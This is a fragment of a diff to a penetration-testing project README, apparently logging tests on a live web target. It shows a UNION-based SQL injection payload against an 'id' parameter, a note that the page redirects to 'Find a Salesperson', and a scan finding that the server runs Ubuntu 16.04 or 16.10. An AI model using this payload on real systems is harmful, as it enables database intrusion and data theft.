krypt0k1/Pen_Testing_Live_Targets-Project/README.md

    - Payload: id=-8495' UNION ALL SELECT  CONCAT(0x716b766a71,0x6b544944475a6778655979637a6558776b595163416a567459494a735864556b4f55666875547352,0x7171717a71),NULL,NULL,NULL,NULL-- -

-Comments after testing: Redirects back to the 'Find a Salesperson' web page.
+Comments after testing: Redirects to the 'Find a Salesperson' web page.

 The scan revelead the following information that can further assist us:
 * Web Server OS : Linux Ubuntu 16.04 or 16.10